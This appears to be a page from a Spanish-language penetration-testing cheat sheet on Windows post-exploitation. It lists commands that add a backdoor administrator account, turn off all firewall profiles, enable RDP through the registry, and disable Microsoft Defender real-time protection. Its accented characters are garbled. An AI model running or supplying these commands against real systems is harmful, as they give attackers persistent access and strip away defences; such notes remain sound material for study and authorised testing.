Windows

Creaci贸n de usuario

# Creaci贸n de usuario
net user <username> <password> /add
# Incorporaci贸n de usuario a grupo "administradores" (Permite RDP)
net localgroup Administrators <username> /add
# Incorporaci贸n de usuario a grupo "usuarios de administraci贸n remota" (Permite WinRM)
net localgroup "Remote Management Users" <username> /add

Firewall

Estado

netsh firewall show state
netsh advfirewall show allprofiles

Desactivar

# S铆mbolo del sistema (cmd)
## desactivar todos los perfiles
netsh advfirewall set allprofiles state off
## desactivar por perfil
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off

# PowerShell
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Apertura de puerto

netsh advfirewall firewall add rule name="Puerto TCP XXXX" dir=in action=allow protocol=TCP localport=<port>

3389/TCP (RDP)

# Revisi贸n de existencia de puerto 3389/TCP abierto
netstat -an | findstr :3389
# Revisi贸n de reglas actuales del firewall
netsh firewall show config
# Habilitaci贸n de servicio Terminal Server
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# Incorporaci贸n de regla en firewall de apertura de puerto 3389/TCP
netsh firewall add portopening TCP 3389 "Remote Desktop Protocol"

Microsoft Defender

Deshabilitar la protecci贸n en tiempo real.

Set-MpPreference -DisableRealtimeMonitoring $true
AnteriorPersistenciaSiguientePivoting

脷ltima actualizaci贸n